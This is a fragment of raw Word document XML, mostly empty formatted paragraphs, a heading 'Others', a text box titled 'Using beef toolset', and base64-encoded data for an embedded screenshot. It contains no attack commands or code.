        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A3E7342" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28D88A96" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16496DA4" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19FFFB8E" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C623B4C" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F899BBE" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D28864A" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26B49C8D" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79E694A0" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DE0C24D" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="528AC755" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="310DED09" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E4B2DFC" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="253013D6" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4075B2D0" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E59A6A2" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="505A8338" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="0"/>
        <w:ind w:right="3583" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Others </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B68EA9D" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="24"/>
        <w:ind w:left="40" w:right="-181"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1DBCBB02" wp14:editId="6C5EEC21">
                <wp:extent cx="5961279" cy="3560294"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:docPr id="43649" name="Group 43649"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup">
                    <wpg:wgp>
                      <wpg:cNvGrpSpPr/>
                      <wpg:grpSpPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="5961279" cy="3560294"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="5961279" cy="3560294"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="6268" name="Rectangle 6268"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="202997" y="0"/>
                            <a:ext cx="1736462" cy="198436"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="397E2BE5" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                                  <w:b/>
                                  <w:sz w:val="24"/>
                                </w:rPr>
                                <w:t>Using beef toolset</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="6269" name="Rectangle 6269"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="1510919" y="0"/>
                            <a:ext cx="55943" cy="198436"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="58A99A5D"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270" name="Rectangle 6270"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="5919216" y="3411093"/>
                            <a:ext cx="55943" cy="198436"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="2A017EBC"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281" name="Picture 6281"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId130"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="12700" y="187406"/>
                            <a:ext cx="5873750" cy="3303905"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                      <wps:wsp>
                        <wps:cNvPr id="6282" name="Shape 6282"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="174706"/>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BCBB02" id="Group 43649" o:spid="_x0000_s1361" style="width:469.4pt;height:280.35pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line" coordsize="59612,35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6zWMwQAAMMNAAAOAAAAZHJzL2Uyb0RvYy54bWzkV9tu2zgQfV9g&#10;/0HQe2NdbNkS4hSLZhsUWGyDXj6ApilLKEUSJH3br9+ZoSS7cboJskDz0ACReRkOz5wZcobXbw+d&#10;jHbCularZZxeJXEkFNfrVm2W8dcv798s4sh5ptZMaiWW8VG4+O3N779d700lMt1ouRY2AiXKVXuz&#10;jBvvTTWZON6IjrkrbYSCyVrbjnno2s1kbdketHdykiVJMdlruzZWc+EcjN6GyfiG9Ne14P5jXTvh&#10;I7mMAZunr6XvCr+Tm2tWbSwzTct7GOwFKDrWKth0VHXLPIu2tr1Q1bXcaqdrf8V1N9F13XJBNoA1&#10;afLAmjurt4Zs2VT7jRlpAmof8PRitfzv3Z01n829BSb2ZgNcUA9tOdS2w19AGR2IsuNImTj4iMPg&#10;rCzSbF7GEYe5fFYkWTkNpPIGmL9Yx5s/n1g5GTaefAdnbyBA3IkD9/84+NwwI4haVwEH9zZq18u4&#10;yAqIV8U6iNRPEDtMbaSIaJToIdmRLFc54O0RpjJgoZzH0SVd6TwvpkUW6ErLxTQvkK3RZlYZ6/yd&#10;0F2EjWVsAQUFFtv95XwQHURwZ6nwq/T7VsowiyNA3QAOW/6wOpB9aTHH7XBspddHsLrR9p+PcH5r&#10;qffLWPetGI807I6zcSQ/KGAbT8/QsENjNTSsl+80nbGA54+t13VLgE+79cDAjQHDz/AnhOYj/iwH&#10;GsD3T/sznaVJmYKmS4fOZuU0fz13LgY7fhF3ziEKL90Jo31UP8udM/Bllhbkznyagm9zXM+q8VJ7&#10;XaeOwfnaTjUtr+C/zzvQurhzn87PsMpvrYh7Jd2zdHTMftuaN5AiDfPtqpWtP1K6h6sQQandfcvx&#10;6sXO+fW9SIf4AAHcFy5vGAPvDpK4DroT7H+nZiVbg7coBgK2e8BQKzzItY/YHPL4rebbTigfChMr&#10;JGDXyjWtcXFkK9GtBOQY+2FNgFjlvBWeN7hhDRtjwkFkZxOE8gQMMf8g5UASTuBswAWVLubThLLK&#10;WUAv5vl8BvOUpfMkL5MZkvLSvEO4AhJqArCfdqMvIHuGK4ByODo4Q1swzTzr+Pc0zafzS5rKMj3R&#10;lJX5BU18G9IzOm1IyVD1rUNyhrFmaPGDGpqYxP+zAIUox3WoFJsRpOLZosfSQF2VByg430GO/qJJ&#10;0p+qq0Ei+PQkI9W57KgTa7VeZ1gxyA2/hnSfy9MVC/EySAy/QTJw+lCGS+1E2ADNongbTQVd52RK&#10;hVZnsymGMWfwFKjh/FDpA1WwWg84QQl6OgQftfxRCuRDqk+ihjIHqtKU1jm7Wb2TNtoxLEzorw96&#10;EsU14dz1q5IfrkJRJk3Del29mn4DsqvXhJKC3h0jmF4t79GExweU8GDn8AQBLsZFBEsrP65X8HCi&#10;Dc+sxWbIDsgL9qioopIZXgqEqH/V4FPkvE/yp7fXzb8AAAD//wMAUEsDBAoAAAAAAAAAIQCcp9Lg&#10;018BANNfAQAUAAAAZHJzL21lZGlhL2ltYWdlMS5qcGf/2P/gABBKRklGAAEBAQBgAGAAAP/bAEMA&#10;AwICAwICAwMDAwQDAwQFCAUFBAQFCgcHBggMCgwMCwoLCw0OEhANDhEOCwsQFhARExQVFRUMDxcY&#10;FhQYEhQVFP/bAEMBAwQEBQQFCQUFCRQNCw0UFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU&#10;FBQUFBQUFBQUFBQUFBQUFBQUFP/AABEIAh4Dx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j4j/tI2/hhdZt9Lu9HFzpryW8txfTjy4LiPzP&#10;3ckccnmf88/+/lcr8A/2lvF3xO+KEGjX8fhm98P3FnPPFqWiJceYJI/L/dv5kh55r5N/aC8E+Nrz&#10;4r+Ojp3g3xBf6bJ4hfUc22mXEkd5H+7/AOmf/TOvQv2C/B/iHwr8Wbe1uvB/iPR9O+yXkkl9q1hJ&#10;bx+Z+78uOs/3lz67+zcDTwPtp1P3k4c/xf8Akp+iNlrtjfSSRwT+bJH/AKz/AGKdHq0EmozWibvP&#10;h4f5PZD/AOziuYt/BlxD9qg86G50+7ne4lgkX+PzCev/AH7/AO/dW9D8HzabrEd3JdJJHHB5XlRj&#10;/pnHH/7TrQ+ROgjv45GjCBvnLp93+4aufwVy174TmvrT7O7whFafZx2k/wD11n6t4Anl+2/2fPDa&#10;xz2/2eOPy/uf6v8A+N0Adfe3UNnayTzyeXFCnmPJ6VQt/EFjcXCQxzP5ryeWA8b53+X5mP8Avisr&#10;/hG57HRtejjk+0PdRyCCNP4fv/ux+dVl8H3V5HJM0/lPPJIXjkO8pG8Hl/8AffSgDuahll8uOuV1&#10;Dwi2tSXMl7HayeZI8nlkb+sccf8A7TqnZfD17S6trjz4ftHnvLPJ5f8ArMyRyf8AtOgDtqg+3QNf&#10;SWnmD7QieYY/9iuFvvBkenLaTbVeNZI5bq3jtGk+0f6wfP8A9/M8/wByrngHQbrR7kGe1+zJ9l8s&#10;f+BEkn/tSgDtLm6isofMmfy0HeqljqkF/JIkT/vIeJI5EKOlR32l+dZ+XFJ5brJHJmT5/uSeZWLf&#10;eEW1LXI9SuXhEkZj8uPy/M8vYkn/AMcoA7CqlrfR31vHPC/7t65HTfBLW1v5c8dncW3meY9vj905&#10;2Y8yrOl+DWs9Wt7uacy/Z40ijG/7mEwaANW88QWFjGJpp8KXkjzs/wCeefM/9ANTR69YTS2caXEZ&#10;kvY/MgH99Kx7rwq82o6pOtyiwXcDxpFs5jlcbN9Sad4Rj0u+89JQ8ST74Y+nlpiQ+WP+ByGgDRPi&#10;Kxjj3mfjz/s33P8AlpWg11As8cJkAkcfKlcnrfgf+1bzUZ4544xd2kkSR7P9XcPH5fmf98cVJceB&#10;7eVi6W9r9pf7X+88v/nrQB2FYsev6fNLGqT8yfc+T6//ABBrB8QeDb7XPNBnt497+bHHtP7uT91+&#10;8/8AHJP+/lSTeE7pY0jjumjl/d/6Rv8AufPIeE/7aUAdl5i+tOrgIfh+8FqiQtbWX7uNCbdG+fYe&#10;e/8AH/nNdzbxeTHsoAmooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKK&#10;ACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooA&#10;KKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAo&#10;oooAKKKKACiiigAoorM/sGw8zf5EfmUAadFFFABWDq3iRtMukgh0281E/wAZto8+XW9WWY7mCaeS&#10;FIpI5n3/ADuU/gx6e1ABourJrFn56QSRDf5flyVqVk+HNHGh6ZHa+Z5uPm31rUAFV7ib7NG77Hk9&#10;k61YqtdQzSW8iQyCOQj5JMfdoAqW+qW91Mkdu4uR9/8Ad/wVpJ0rI07R/wCy7gyQv+7k5n3/APLS&#10;T/npWzQAUUUUAVcSeXnFVY9YsfPlje7h82P/AFkfmfcq9XI3WiagkF35U83mXF/HOI/3fl7PMj/o&#10;KAOss7qK8t45oZPMikGUerFcT4f0vUNPbT47lZQlvDHGSk37riLZ5f8ArP7/AP0zrtaAIpJfJj3v&#10;US30EixOkifv/wDV/wC3UOrW73mmXMCLl5I3QfjXLW/hu70+e3kTa8dpLJ9kjaQfu98cn/s8mygD&#10;uqpx31uY4pPOBSb/AFf+3XHaTp+rx3iPew3ckHnZjjF1zGPLj+/+85/5aVA/hrWLdbOO1lmJEf8A&#10;pH7/AP5aeXJ/8WlAHolFcZqGk6lHGI4DPNb787BOd+PL9fMj/wCWldZHmONN53yUASv0qidQtYY9&#10;7zJGm/y/9ZxWhXFarouoTzaqluqx20kEklufM+f7Q8ezj+5/9soA7OP7op1cJFpmvp9tk8xjc7zJ&#10;H+8/dyfvfk/8h1s+F9LvrFbkX9w9zz5cPmf886AOiqu91HE8cbyIJJPuf7dWK5Pxlol5q32eSx3R&#10;yRxz/PHJscF49gP+fSgDrKhkkEP7x3xHXG3Wm6lDcSwot1cRfv8AyNl1jy/3cfl/+1Kj1bSdX1K2&#10;u9PCTPF5dwBcfaMeZv8A9XQB3lFQW3/HvH8nl/J/q/Sp6AM5tZtPtn2P7VD9sx/x7+YN9X/4K5XV&#10;dNu7yW4tlgeKO4u47g3gdP3aJ5f/AMbqlHourrbyPHPNDeRuP9Y58t/78n+s/wCmn/kOgDs45kl+&#10;49TVx/8AZV7CII1S5uEUyBH+0bNh35jeT95+8qC30vVIYbZvLupZvPTzI5J/3f8A10/1n+f+edAH&#10;b0UUUAVEuopMlXT7/l/9tKRryNLxIGf966b0jrlbbQdQjlkZLuRc3dzPHHII/LQv5vlv/fz86VQ/&#10;sfVIZLa5dLplT92YpJ8un7y34T95/wBM5KAPRaKxdBt5rW0l+1I8ReR3SOSTzNielbVABRRRQAUU&#10;UUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRR&#10;QAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFA&#10;BRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAF&#10;FFFABRRRQB8JeBP2/vH3xEs7i78PfCJNTjt5PLk+z6m8mz/yFVi+/b28cWFtJPN8MbMCOPzHxqz/&#10;APxqvm39mD4iXfw7hs3Sd49Oku45Lvy4/wB5JH/10r17x5q0/jT4b61fR3el6v8AYY5JPMs4TaXM&#10;ccnmSf6sx+XJ/wDa6/UIcPYenGFSvT/dzPzrFZxivaezoEUn/BU/XYtPju3+Gdr9mkkkt0k/tZ/9&#10;ZH5f/TL/AKaR0o/4Kq64sZkHwvh/8Gkv/wAj18Ua3/yIek/9hPUP/RdvXu3h/RrvVNHtvssfm+Xb&#10;xySfvK8vL8kpY6pUX8h9TLFOmqftD1yX/gq1q0f3vhrbL/101Z//AI1U0P8AwVS8QSW3nR/CuGW2&#10;/wCeseqSeX/6T18g/GT/AI+NO/7aV+gf7Jn7Ofgnxl+zL4M1a68OQXuq30VxLPJcXdxH5n+kSf8A&#10;POSvMxeFwuX1uStqdXvv4DzH/h7Dq3/ROLL/AMGz/wDxqt7wn/wUj8c+PpLmPw38FbjXJIP+Pj+z&#10;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&#10;/wDxqv